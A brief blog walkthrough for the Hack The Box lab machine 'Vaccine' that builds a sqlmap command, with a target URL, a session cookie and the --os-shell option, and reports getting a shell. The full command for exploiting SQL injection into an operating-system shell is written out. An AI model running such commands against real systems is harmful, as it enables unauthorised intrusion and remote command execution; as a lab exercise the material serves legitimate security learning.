top of page
Search

Basics - How to use sqlmap

  • Admin
  • Sep 1, 2021
  • 1 min read

sqlmap is used in the HTB machine Vaccine



First let's get the help using

sqlmap -h

This will help us structure our sqlmap query



1. We need to provide the target url

--url="http://10.129.247.166/dashboard.php?search=sandy"


2. We need to provide the PHPSESSID

--cookie="PHPSESSID=530lii3ob5pbh3hii8rifld73o"


3. We need to add --os-shell to get a shell

--os-shell can be used to get a shell



With all that info we can now construct our query as follow:

sqlmap --url="http://10.129.247.166/dashboard.php?search=sandy" --cookie="PHPSESSID=530lii3ob5pbh3hii8rifld73o" --os-shell

Your IP and your PHPSESSID will be different than mine

You will now be prompted to enter Y or N a couple of times. Just press enter for all.



We got the shell!


 
 
 

Recent Posts

See All

Comments

Rated 0 out of 5 stars.
No ratings yet

Add a rating

©2025 by My Tech On IT

bottom of page